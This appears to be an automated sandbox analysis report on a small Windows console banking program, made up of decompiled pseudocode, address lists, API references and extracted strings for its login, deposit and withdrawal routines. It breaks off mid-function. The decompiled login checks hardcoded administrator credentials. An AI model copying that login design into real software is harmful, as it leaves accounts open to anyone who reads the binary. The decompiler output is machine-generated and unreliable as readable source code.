                                                                      0x00be4ad9
                                                                      0x00be4add
                                                                      0x00be4ae1
                                                                      0x00be4ae8
                                                                      0x00be4aef
                                                                      0x00be4afc
                                                                      0x00be4b02
                                                                      0x00be4b07
                                                                      0x00be4b0a
                                                                      0x00be4b0d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be4b1a
                                                                      0x00be4b1f
                                                                      0x00be4b22
                                                                      0x00be4b24
                                                                      0x00be4b26
                                                                      0x00be4b2b
                                                                      0x00be4b2f
                                                                      0x00be4b31
                                                                      0x00be4b3a
                                                                      0x00be4b3f
                                                                      0x00be4b47
                                                                      0x00be4b4c
                                                                      0x00be4b51
                                                                      0x00be4b5d
                                                                      0x00be4b62
                                                                      0x00be4b67
                                                                      0x00be4b6f
                                                                      0x00000000
                                                                      0x00be4b6f
                                                                      0x00be4b2f
                                                                      0x00be4b7b
                                                                      0x00be4b80
                                                                      0x00be4b85
                                                                      0x00be4b86
                                                                      0x00be4b8e
                                                                      0x00be4b97
                                                                      0x00be4b9c
                                                                      0x00be4ba1
                                                                      0x00be4ba6
                                                                      0x00be4bab
                                                                      0x00be4bb7
                                                                      0x00be4bc0
                                                                      0x00be4bcb
                                                                      0x00be4bcf
                                                                      0x00be4bdc
                                                                      0x00be4beb
                                                                      0x00be4bf3
                                                                      0x00be4bf8
                                                                      0x00be4c0b
                                                                      0x00be4c1f
                                                                      0x00be4c42
                                                                      0x00be4c4d
                                                                      0x00be4c4e
                                                                      0x00be4c5a
                                                                      0x00be4c5f
                                                                      0x00be4c64
                                                                      0x00be4c69
                                                                      0x00be4c6c
                                                                      0x00be4c70
                                                                      0x00be4c73
                                                                      0x00be4c82
                                                                      0x00be4c94
                                                                      0x00be4ca3
                                                                      0x00be4ca8
                                                                      0x00be4cab
                                                                      0x00be4cb0
                                                                      0x00be4cb7
                                                                      0x00be4cba
                                                                      0x00be4cbe
                                                                      0x00be4cc2
                                                                      0x00be4cc6
                                                                      0x00be4ccd
                                                                      0x00be4cd1
                                                                      0x00be4cd5
                                                                      0x00be4cd9
                                                                      0x00be4cdd
                                                                      0x00be4ce4
                                                                      0x00be4ceb
                                                                      0x00be4cf8
                                                                      0x00be4cff
                                                                      0x00be4d04
                                                                      0x00be4d07
                                                                      0x00be4d0a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be4d1b
                                                                      0x00be4d20
                                                                      0x00be4d23
                                                                      0x00be4d25
                                                                      0x00be4d27
                                                                      0x00be4d2c
                                                                      0x00be4d31
                                                                      0x00be4d31
                                                                      0x00be4d36
                                                                      0x00be4d3e
                                                                      0x00be4d42
                                                                      0x00be4d44
                                                                      0x00be4d49
                                                                      0x00be4d4e
                                                                      0x00be4d53
                                                                      0x00be4d5b
                                                                      0x00be4d5b
                                                                      0x00be4d60
                                                                      0x00be4d65
                                                                      0x00be4d6a
                                                                      0x00be4d6f
                                                                      0x00be4d77
                                                                      0x00be4d7c
                                                                      0x00be4d84
                                                                      0x00be4d89
                                                                      0x00be4d91
                                                                      0x00be4d9a
                                                                      0x00be4da1
                                                                      0x00be4da6
                                                                      0x00be4daa
                                                                      0x00be4dae
                                                                      0x00be4db2
                                                                      0x00be4db9
                                                                      0x00be4dc0
                                                                      0x00be4dc7
                                                                      0x00be4dc8
                                                                      0x00be4dcd
                                                                      0x00be4dd3
                                                                      0x00be4dd4
                                                                      0x00be4dd9
                                                                      0x00be4dd9
                                                                      0x00be4de1
                                                                      0x00be4de6
                                                                      0x00be4de7
                                                                      0x00be4def
                                                                      0x00be4df5
                                                                      0x00be4df6
                                                                      0x00be4e10
                                                                      0x00be4e1a
                                                                      0x00be4e22
                                                                      0x00be4e27
                                                                      0x00be4e2f
                                                                      0x00be4e34
                                                                      0x00be4e39
                                                                      0x00be4e3e
                                                                      0x00be4e46
                                                                      0x00be4e47
                                                                      0x00be4e4c
                                                                      0x00be4e51
                                                                      0x00be4e52
                                                                      0x00be4e5a
                                                                      0x00be4e60
                                                                      0x00be4e61
                                                                      0x00be4e69
                                                                      0x00be4e72
                                                                      0x00be4e77
                                                                      0x00000000
                                                                      0x00be4e81
                                                                      0x00be4c79
                                                                      0x00be4c7c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be4e87

                                                                      APIs
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE20FF
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE213E
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE215F
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE216C
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE2188
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE2195
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE21C8
                                                                        • Part of subcall function 00BE12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D1
                                                                        • Part of subcall function 00BE12B0: SetConsoleCursorPosition.KERNEL32(00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D8
                                                                      • _wprintf.LIBCMT ref: 00BE4A03
                                                                      • _wscanf.LIBCMT ref: 00BE4A14
                                                                        • Part of subcall function 00BE738B: _vwscanf.LIBCMT ref: 00BE739C
                                                                        • Part of subcall function 00BE6EF1: __fsopen.LIBCMT ref: 00BE6EFC
                                                                      • _wprintf.LIBCMT ref: 00BE4A4C
                                                                        • Part of subcall function 00BE715C: __stbuf.LIBCMT ref: 00BE71A8
                                                                        • Part of subcall function 00BE715C: __output_s_l.LIBCMT ref: 00BE71C2
                                                                        • Part of subcall function 00BE715C: __ftbuf.LIBCMT ref: 00BE71D6
                                                                      • _wprintf.LIBCMT ref: 00BE4A6E
                                                                      • _wprintf.LIBCMT ref: 00BE4A84
                                                                      • _wscanf.LIBCMT ref: 00BE4A95
                                                                      • _swscanf.LIBCMT ref: 00BE4B02
                                                                      • _wprintf.LIBCMT ref: 00BE4B51
                                                                      • _wprintf.LIBCMT ref: 00BE4B67
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE2152
                                                                      Strings
                                                                      • Amount to be Withdrawn (in NRs.) : , xrefs: 00BE4A7F
                                                                      • ACCOUNT.DAT, xrefs: 00BE4AA2
                                                                      • Transaction completed successfully!, xrefs: 00BE4E77
                                                                      • %s to be Withdrawn from A/C number : %s [%s], xrefs: 00BE4BD7
                                                                      • %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 00BE4DC8
                                                                      • Transaction NOT completed!, xrefs: 00BE4B62
                                                                      • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 00BE4CF3
                                                                      • Are you sure you want to perform this tranasction? <Y/N>, xrefs: 00BE4C5F
                                                                      • Confirm Transaction, xrefs: 00BE4B9C
                                                                      • Given A/C number does not exits!, xrefs: 00BE4A47
                                                                      • TEMP.DAT, xrefs: 00BE4C9E
                                                                      • Sorry, the current balance is Rs. %.2f only!, xrefs: 00BE4B4C
                                                                      • %s %s %s %s %.2f %s, xrefs: 00BE4E47
                                                                      • [ %s ], xrefs: 00BE4A69
                                                                      • Withdraw from A/C number : , xrefs: 00BE49FE
                                                                      • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 00BE4AF7
                                                                      • ACCOUNT.DAT, xrefs: 00BE4C87
                                                                      • ACCOUNT.DAT, xrefs: 00BE4A21
                                                                      • TRANSACTION.DAT, xrefs: 00BE4E03
                                                                      • Cash+Withdrawn, xrefs: 00BE4E3E
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.224908255.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000001.00000002.224904531.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224920014.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224925639.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224930208.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_swscanf_vwscanf
                                                                      • String ID: %s %s %s %s %.2f %s$%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$%s %s %s %s %s %s %c %s %c %f %f %f$%s to be Withdrawn from A/C number : %s [%s]$ACCOUNT.DAT$ACCOUNT.DAT$ACCOUNT.DAT$Amount to be Withdrawn (in NRs.) : $Are you sure you want to perform this tranasction? <Y/N>$Cash+Withdrawn$Confirm Transaction$Given A/C number does not exits!$Sorry, the current balance is Rs. %.2f only!$TEMP.DAT$TRANSACTION.DAT$Transaction NOT completed!$Transaction completed successfully!$Withdraw from A/C number : $[ %s ]
                                                                      • API String ID: 427838879-2716176803
                                                                      • Opcode ID: 4d8ed0615d20e608632376254451aa415a02a85a1caf3972b8c9ecf6d9b11c5b
                                                                      • Instruction ID: 2084bcd04edfe494d24f824800270328d307ae5dae18a4602a10f54ed1346dc2
                                                                      • Opcode Fuzzy Hash: 4d8ed0615d20e608632376254451aa415a02a85a1caf3972b8c9ecf6d9b11c5b
                                                                      • Instruction Fuzzy Hash: C5C1C3B2D402496ADB11EBE5CC42FDEB3B8AF59700F1486A9F605760C1FB716648CF62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E00BE22F0(void* __edi, void* __esi, void* __fp0) {
                                                                      				char _v5;
                                                                      				char _v6;
                                                                      				signed int _v12;
                                                                      				intOrPtr _v16;
                                                                      				intOrPtr _v20;
                                                                      				intOrPtr _v24;
                                                                      				signed int _v28;
                                                                      				char _v31;
                                                                      				char _v35;
                                                                      				char _v39;
                                                                      				char _v43;
                                                                      				char _v47;
                                                                      				char _v51;
                                                                      				char _v55;
                                                                      				char _v59;
                                                                      				char _v60;
                                                                      				char _v92;
                                                                      				void* __ebp;
                                                                      				void* _t50;
                                                                      				void* _t74;
                                                                      				void* _t78;
                                                                      				void* _t85;
                                                                      				void* _t94;
                                                                      				void* _t95;
                                                                      				void* _t96;
                                                                      				void* _t100;
                                                                      				void* _t101;
                                                                      				void* _t106;
                                                                      				void* _t116;
                                                                      
                                                                      				_t116 = __fp0;
                                                                      				_t95 = __esi;
                                                                      				_t94 = __edi;
                                                                      				_v60 = 0;
                                                                      				_v59 = 0;
                                                                      				_v55 = 0;
                                                                      				_v51 = 0;
                                                                      				_v47 = 0;
                                                                      				_v43 = 0;
                                                                      				_v39 = 0;
                                                                      				_v35 = 0;
                                                                      				_v31 = 0;
                                                                      				_v20 = 0;
                                                                      				_v16 = 0;
                                                                      				do {
                                                                      					_v20 = 0;
                                                                      					E00BE12B0(7, 5);
                                                                      					_push("Only THREE attempts shall be allowed to enter username and password.");
                                                                      					E00BE715C(_t85, _t94, _t95, 0);
                                                                      					E00BE1380(_t94, _t95, 0, 0xa, 8, 0x46, 0xf);
                                                                      					E00BE12B0(0x17, 0xa);
                                                                      					_push("Enter User name : ");
                                                                      					E00BE715C(_t85, _t94, _t95, 0);
                                                                      					E00BE738B("%s",  &_v92);
                                                                      					E00BE12B0(0x17, 0xc);
                                                                      					_push("Password        : ");
                                                                      					E00BE715C(_t85, _t94, _t95, 0);
                                                                      					_t100 = _t96 + 0x14;
                                                                      					E00BE12F0(_t94, _t95,  &_v60);
                                                                      					_v16 = _v16 + 1;
                                                                      					_t110 = _v16 - 3;
                                                                      					if(_v16 == 3) {
                                                                      						E00BE20E0( &_v92, _t94, _t95, _t110, _t116);
                                                                      						E00BE12B0(0x19, 8);
                                                                      						_push(0xbff224);
                                                                      						E00BE715C(_t85, _t94, _t95, _t110);
                                                                      						E00BE12B0(0x16, 0xb);
                                                                      						_push("Press any key to exit the program...");
                                                                      						E00BE715C(_t85, _t94, _t95, _t110);
                                                                      						_t100 = _t100 + 8;
                                                                      						E00BE77B1(0);
                                                                      					}
                                                                      					_t87 =  &_v92;
                                                                      					_t50 = E00BE8230( &_v92, "ADMIN");
                                                                      					_t101 = _t100 + 8;
                                                                      					if(_t50 != 0) {
                                                                      						L6:
                                                                      						E00BE20E0(_t87, _t94, _t95, __eflags, _t116);
                                                                      						E00BE12B0(0x19, 0xa);
                                                                      						_push(0xbff278);
                                                                      						E00BE715C(_t85, _t94, _t95, __eflags);
                                                                      						_t96 = _t101 + 4;
                                                                      					} else {
                                                                      						_t78 = E00BE8230( &_v60, "IOE");
                                                                      						_t101 = _t101 + 8;
                                                                      						if(_t78 != 0) {
                                                                      							goto L6;
                                                                      						} else {
                                                                      							_v20 = 1;
                                                                      						}
                                                                      					}
                                                                      					_t113 = _v20 - 1;
                                                                      				} while (_v20 != 1);
                                                                      				do {
                                                                      					E00BE20E0(_t87, _t94, _t95, _t113, _t116);
                                                                      					E00BE12B0(0x1e, 8);
                                                                      					_push("1. Add User");
                                                                      					E00BE715C(_t85, _t94, _t95, _t113);
                                                                      					E00BE12B0(0x1e, 0xa);
                                                                      					_push("2. Delete User");
                                                                      					E00BE715C(_t85, _t94, _t95, _t113);
                                                                      					E00BE12B0(0x1e, 0xc);
                                                                      					_push("3. Edit User name / Password");
                                                                      					E00BE715C(_t85, _t94, _t95, _t113);
                                                                      					E00BE12B0(0x1e, 0xe);
                                                                      					_push("4. View User Log");
                                                                      					E00BE715C(_t85, _t94, _t95, _t113);
                                                                      					E00BE12B0(0x1e, 0x10);
                                                                      					_push("5. Exit");
                                                                      					E00BE715C(_t85, _t94, _t95, _t113);
                                                                      					_t106 = _t96 + 0x14;
                                                                      					E00BE12B0(1, 0x11);
                                                                      					_v24 = 0;
                                                                      					while(1) {
                                                                      						_t114 = _v24 - 0x4e;
                                                                      						if(_v24 >= 0x4e) {
                                                                      							break;
                                                                      						}
                                                                      						_push("_");
                                                                      						E00BE715C(_t85, _t94, _t95, _t114);
                                                                      						_t106 = _t106 + 4;
                                                                      						_v24 = _v24 + 1;
                                                                      					}
                                                                      					E00BE12B0(0x17, 0x13);
                                                                      					_push(" Press a number between the range [1 -5]  ");
                                                                      					E00BE715C(_t85, _t94, _t95, __eflags);
                                                                      					_t96 = _t106 + 4;
                                                                      					_t89 = _v6 - 0x30;
                                                                      					_v28 = _v6 - 0x30;
                                                                      					_v12 = _v28;
                                                                      					_v12 = _v12 - 1;
                                                                      					__eflags = _v12 - 4;
                                                                      					if(__eflags > 0) {
                                                                      						E00BE20E0(_t89, _t94, _t95, __eflags, _t116);
                                                                      						E00BE12B0(0xa, 0xa);
                                                                      						_push("Your input is out of range! Enter a choice between 1 to 5!");
                                                                      						E00BE715C(_t85, _t94, _t95, __eflags);
                                                                      						E00BE12B0(0xf, 0xc);
                                                                      						_push("Press ENTER to return to main menu...");
                                                                      						_t74 = E00BE715C(_t85, _t94, _t95, __eflags);
                                                                      						_t96 = _t96 + 8;
                                                                      					} else {
                                                                      						switch( *((intOrPtr*)(_v12 * 4 +  &M00BE25A8))) {
                                                                      							case 0:
                                                                      								_t74 = E00BE25C0(_t85, _t94, _t95, _t116);
                                                                      								goto L23;
                                                                      							case 1:
                                                                      								E00BE2800(__ebx, __ecx, __edi, __esi, __fp0);
                                                                      								goto L23;
                                                                      							case 2:
                                                                      								E00BE2B10(__ebx, __edi, __esi, __fp0);
                                                                      								goto L23;
                                                                      							case 3:
                                                                      								E00BE2E80(__ebx, __edx, __eflags, __fp0);
                                                                      								goto L23;
                                                                      							case 4:
                                                                      								E00BE20E0(__ecx, __edi, __esi, __eflags, __fp0);
                                                                      								E00BE12B0(0xf, 0xa);
                                                                      								_push("Are you sure you want to exit? <Y/N> : ");
                                                                      								E00BE715C(__ebx, __edi, __esi, __eflags);
                                                                      								__esp = __esp + 4;
                                                                      								__edx = _v5;
                                                                      								__eflags = _v5 - 0x59;
                                                                      								if(_v5 == 0x59) {
                                                                      									L20:
                                                                      									E00BE77B1(0);
                                                                      								} else {
                                                                      									__eflags = _v5 - 0x79;
                                                                      									if(_v5 == 0x79) {
                                                                      										goto L20;
                                                                      									}
                                                                      								}
                                                                      								goto L23;
                                                                      						}
                                                                      					}
                                                                      					L23:
                                                                      					_t87 = 1;
                                                                      					__eflags = 1;
                                                                      				} while (1 != 0);
                                                                      				return _t74;
                                                                      			}
































                                                                      0x00be22f0
                                                                      0x00be22f0
                                                                      0x00be22f0
                                                                      0x00be22f6
                                                                      0x00be22fc
                                                                      0x00be22ff
                                                                      0x00be2302
                                                                      0x00be2305
                                                                      0x00be2308
                                                                      0x00be230b
                                                                      0x00be230e
                                                                      0x00be2311
                                                                      0x00be2314
                                                                      0x00be231b
                                                                      0x00be2322
                                                                      0x00be2322
                                                                      0x00be232d
                                                                      0x00be2332
                                                                      0x00be2337
                                                                      0x00be2347
                                                                      0x00be2350
                                                                      0x00be2355
                                                                      0x00be235a
                                                                      0x00be236b
                                                                      0x00be2377
                                                                      0x00be237c
                                                                      0x00be2381
                                                                      0x00be2386
                                                                      0x00be238d
                                                                      0x00be2398
                                                                      0x00be239b
                                                                      0x00be239f
                                                                      0x00be23a1
                                                                      0x00be23aa
                                                                      0x00be23af
                                                                      0x00be23b4
                                                                      0x00be23c0
                                                                      0x00be23c5
                                                                      0x00be23ca
                                                                      0x00be23cf
                                                                      0x00be23d4
                                                                      0x00be23d4
                                                                      0x00be23de
                                                                      0x00be23e2
                                                                      0x00be23e7
                                                                      0x00be23ec
                                                                      0x00be240c
                                                                      0x00be240c
                                                                      0x00be2415
                                                                      0x00be241a
                                                                      0x00be241f
                                                                      0x00be2424
                                                                      0x00be23ee
                                                                      0x00be23f7
                                                                      0x00be23fc
                                                                      0x00be2401
                                                                      0x00000000
                                                                      0x00be2403
                                                                      0x00be2403
                                                                      0x00be2403
                                                                      0x00be2401
                                                                      0x00be2427
                                                                      0x00be2427
                                                                      0x00be2431
                                                                      0x00be2431
                                                                      0x00be243a
                                                                      0x00be243f
                                                                      0x00be2444
                                                                      0x00be2450
                                                                      0x00be2455
                                                                      0x00be245a
                                                                      0x00be2466
                                                                      0x00be246b
                                                                      0x00be2470
                                                                      0x00be247c
                                                                      0x00be2481
                                                                      0x00be2486
                                                                      0x00be2492
                                                                      0x00be2497
                                                                      0x00be249c
                                                                      0x00be24a1
                                                                      0x00be24a8
                                                                      0x00be24ad
                                                                      0x00be24bf
                                                                      0x00be24bf
                                                                      0x00be24c3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be24c5
                                                                      0x00be24ca
                                                                      0x00be24cf
                                                                      0x00be24bc
                                                                      0x00be24bc
                                                                      0x00be24d8
                                                                      0x00be24dd
                                                                      0x00be24e2
                                                                      0x00be24e7
                                                                      0x00be24ee
                                                                      0x00be24f1
                                                                      0x00be24f7
                                                                      0x00be2500
                                                                      0x00be2503
                                                                      0x00be2507
                                                                      0x00be2565
                                                                      0x00be256e
                                                                      0x00be2573
                                                                      0x00be2578
                                                                      0x00be2584
                                                                      0x00be2589
                                                                      0x00be258e
                                                                      0x00be2593
                                                                      0x00be2509
                                                                      0x00be250c
                                                                      0x00000000
                                                                      0x00be2513
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be251a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be2521
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be2528
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be252f
                                                                      0x00be2538
                                                                      0x00be253d
                                                                      0x00be2542
                                                                      0x00be2547
                                                                      0x00be254a
                                                                      0x00be254e
                                                                      0x00be2551
                                                                      0x00be255c
                                                                      0x00be255e
                                                                      0x00be2553
                                                                      0x00be2557
                                                                      0x00be255a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be255a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be250c
                                                                      0x00be2596
                                                                      0x00be2596
                                                                      0x00be259b
                                                                      0x00be259b
                                                                      0x00be25a6

                                                                      APIs
                                                                        • Part of subcall function 00BE12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D1
                                                                        • Part of subcall function 00BE12B0: SetConsoleCursorPosition.KERNEL32(00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D8
                                                                      • _wprintf.LIBCMT ref: 00BE2337
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE139D
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE13DB
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE13FC
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE1470
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE1493
                                                                      • _wprintf.LIBCMT ref: 00BE235A
                                                                        • Part of subcall function 00BE715C: __stbuf.LIBCMT ref: 00BE71A8
                                                                        • Part of subcall function 00BE715C: __output_s_l.LIBCMT ref: 00BE71C2
                                                                        • Part of subcall function 00BE715C: __ftbuf.LIBCMT ref: 00BE71D6
                                                                      • _wscanf.LIBCMT ref: 00BE236B
                                                                        • Part of subcall function 00BE738B: _vwscanf.LIBCMT ref: 00BE739C
                                                                      • _wprintf.LIBCMT ref: 00BE2381
                                                                        • Part of subcall function 00BE12F0: _wprintf.LIBCMT ref: 00BE1329
                                                                      • _wprintf.LIBCMT ref: 00BE23B4
                                                                      • _wprintf.LIBCMT ref: 00BE241F
                                                                        • Part of subcall function 00BE25C0: _wprintf.LIBCMT ref: 00BE262D
                                                                        • Part of subcall function 00BE25C0: _wscanf.LIBCMT ref: 00BE263F
                                                                        • Part of subcall function 00BE25C0: _swscanf.LIBCMT ref: 00BE2681
                                                                        • Part of subcall function 00BE25C0: _wprintf.LIBCMT ref: 00BE26D1
                                                                      • _wprintf.LIBCMT ref: 00BE23CA
                                                                        • Part of subcall function 00BE77B1: _doexit.LIBCMT ref: 00BE77BB
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE2152
                                                                      • _wprintf.LIBCMT ref: 00BE2444
                                                                      • _wprintf.LIBCMT ref: 00BE245A
                                                                      • _wprintf.LIBCMT ref: 00BE2470
                                                                      • _wprintf.LIBCMT ref: 00BE2486
                                                                      • _wprintf.LIBCMT ref: 00BE249C
                                                                      • _wprintf.LIBCMT ref: 00BE24CA
                                                                      • _wprintf.LIBCMT ref: 00BE24E2
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE20FF
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE213E
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE215F
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE216C
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE2188
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE2195
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE21C8
                                                                      Strings
                                                                      • 4. View User Log, xrefs: 00BE2481
                                                                      • Password : , xrefs: 00BE237C
                                                                      • 1. Add User, xrefs: 00BE243F
                                                                      • Your input is out of range! Enter a choice between 1 to 5!, xrefs: 00BE2573
                                                                      • 5. Exit, xrefs: 00BE2497
                                                                      • ADMIN, xrefs: 00BE23D9
                                                                      • 3. Edit User name / Password, xrefs: 00BE246B
                                                                      • 2. Delete User, xrefs: 00BE2455
                                                                      • Only THREE attempts shall be allowed to enter username and password., xrefs: 00BE2332
                                                                      • IOE, xrefs: 00BE23EE
                                                                      • Press any key to exit the program..., xrefs: 00BE23C5
                                                                      • Are you sure you want to exit? <Y/N> : , xrefs: 00BE253D
                                                                      • Enter User name : , xrefs: 00BE2355
                                                                      • N, xrefs: 00BE24BF
                                                                      • Press a number between the range [1 -5] , xrefs: 00BE24DD
                                                                      • Press ENTER to return to main menu..., xrefs: 00BE2589
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.224908255.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000001.00000002.224904531.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224920014.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224925639.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224930208.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf_doexit_swscanf_vwscanf
                                                                      • String ID: Press a number between the range [1 -5] $1. Add User$2. Delete User$3. Edit User name / Password$4. View User Log$5. Exit$ADMIN$Are you sure you want to exit? <Y/N> : $Enter User name : $IOE$N$Only THREE attempts shall be allowed to enter username and password.$Password : $Press ENTER to return to main menu...$Press any key to exit the program...$Your input is out of range! Enter a choice between 1 to 5!
                                                                      • API String ID: 3691436685-2046970424
                                                                      • Opcode ID: 5dff1de0fcbf1a666caf568cb5b30ef62a405c74247c7e6b98ca8d6a81278d43
                                                                      • Instruction ID: 356120723aa1a966aa06d3f98d7da73afc5232578c1830f18e55f5bee581c0d6
                                                                      • Opcode Fuzzy Hash: 5dff1de0fcbf1a666caf568cb5b30ef62a405c74247c7e6b98ca8d6a81278d43
                                                                      • Instruction Fuzzy Hash: 636165B1E9438AA5EB20BBA68C43BAD76F45F11B00F1045E4F705792C2DBB15148876B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 44%
                                                                      			E00BE4640(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                      				char _v5;
                                                                      				char _v12;
                                                                      				intOrPtr _v16;
                                                                      				char _v28;
                                                                      				char _v32;
                                                                      				char _v36;
                                                                      				char _v40;
                                                                      				char _v42;
                                                                      				char _v62;
                                                                      				char _v112;
                                                                      				char _v113;
                                                                      				char _v125;
                                                                      				char _v140;
                                                                      				char _v170;
                                                                      				char _v200;
                                                                      				char _v208;
                                                                      				char _v244;
                                                                      				char _v280;
                                                                      				char _v360;
                                                                      				char _v440;
                                                                      				void* __ebp;
                                                                      				void* _t57;
                                                                      				char _t73;
                                                                      				intOrPtr _t75;
                                                                      				void* _t80;
                                                                      				intOrPtr _t81;
                                                                      				intOrPtr _t86;
                                                                      				void* _t93;
                                                                      				intOrPtr _t103;
                                                                      				intOrPtr _t113;
                                                                      				intOrPtr _t114;
                                                                      				intOrPtr _t129;
                                                                      				intOrPtr _t134;
                                                                      				void* _t137;
                                                                      				void* _t141;
                                                                      				void* _t151;
                                                                      				void* _t153;
                                                                      				void* _t154;
                                                                      				void* _t163;
                                                                      
                                                                      				_t170 = __fp0;
                                                                      				_t168 = __eflags;
                                                                      				_t136 = __esi;
                                                                      				_t135 = __edi;
                                                                      				_t101 = __ebx;
                                                                      				_v16 = 0;
                                                                      				E00BE20E0(__ecx, __edi, __esi, __eflags, __fp0);
                                                                      				E00BE12B0(5, 0xa);
                                                                      				_push("Deposit to A/C number            : ");
                                                                      				E00BE715C(__ebx, __edi, __esi, __eflags);
                                                                      				E00BE738B("%s",  &_v28);
                                                                      				 *0xc02f28 = E00BE6EF1("ACCOUNT.DAT", "r");
                                                                      				_t103 =  *0xc02f28; // 0x0
                                                                      				_push(_t103);
                                                                      				E00BE6DB6(__ebx, _t135, _t136, _t168);
                                                                      				_t141 = _t137 + 0x18;
                                                                      				_t169 = _v16;
                                                                      				if(_v16 == 0) {
                                                                      					E00BE20E0(_t103, _t135, _t136, _t169, __fp0);
                                                                      					E00BE12B0(0x14, 0xc);
                                                                      					_push("Given A/C number does not exits!");
                                                                      					return E00BE715C(_t101, _t135, _t136, _t169);
                                                                      				}
                                                                      				E00BE12B0(0x32, 0xa);
                                                                      				_push( &_v244);
                                                                      				_push("[ %s ]");
                                                                      				E00BE715C(_t101, _t135, _t136, __eflags);
                                                                      				E00BE12B0(5, 0xc);
                                                                      				_push("Amount to be Deposited (in NRs.) : ");
                                                                      				E00BE715C(_t101, _t135, _t136, __eflags);
                                                                      				E00BE738B("%f",  &_v12);
                                                                      				E00BE20E0(_t103, _t135, _t136, __eflags, __fp0);
                                                                      				E00BE12B0(0x1e, 0xa);
                                                                      				_push("Confirm Transaction");
                                                                      				_t57 = E00BE715C(_t101, _t135, _t136, __eflags);
                                                                      				asm("movss xmm0, [ebp-0x8]");
                                                                      				asm("movss [esp], xmm0");
                                                                      				E00BE1870(_t57,  &_v280);
                                                                      				E00BE12B0(3, 0xc);
                                                                      				_push( &_v244);
                                                                      				_push( &_v28);
                                                                      				E00BE715C(_t101, _t135, _t136, __eflags);
                                                                      				asm("cvtss2sd xmm0, [ebp-0x8]");
                                                                      				asm("movsd [esp], xmm0");
                                                                      				E00BE1B30( &_v440, "%s to be deposited in A/C number : %s [ %s ]",  &_v280);
                                                                      				E00BE8140( &_v360,  &_v440);
                                                                      				E00BE8140( &_v360, "]");
                                                                      				E00BE12B0(0x28 - (E00BE82C0( &_v360) >> 1), 0xe);
                                                                      				_push( &_v360);
                                                                      				E00BE7229(_t101, _t135, _t136, __eflags);
                                                                      				E00BE12B0(8, 0x11);
                                                                      				_push("Are you sure you want to perform this tranasction? <Y/N>");
                                                                      				E00BE715C(_t101, _t135, _t136, __eflags);
                                                                      				_t151 = _t141 + 0x24 - 8 + 0x1c;
                                                                      				_t73 = _v5;
                                                                      				__eflags = _t73 - 0x59;
                                                                      				if(_t73 == 0x59) {
                                                                      					L4:
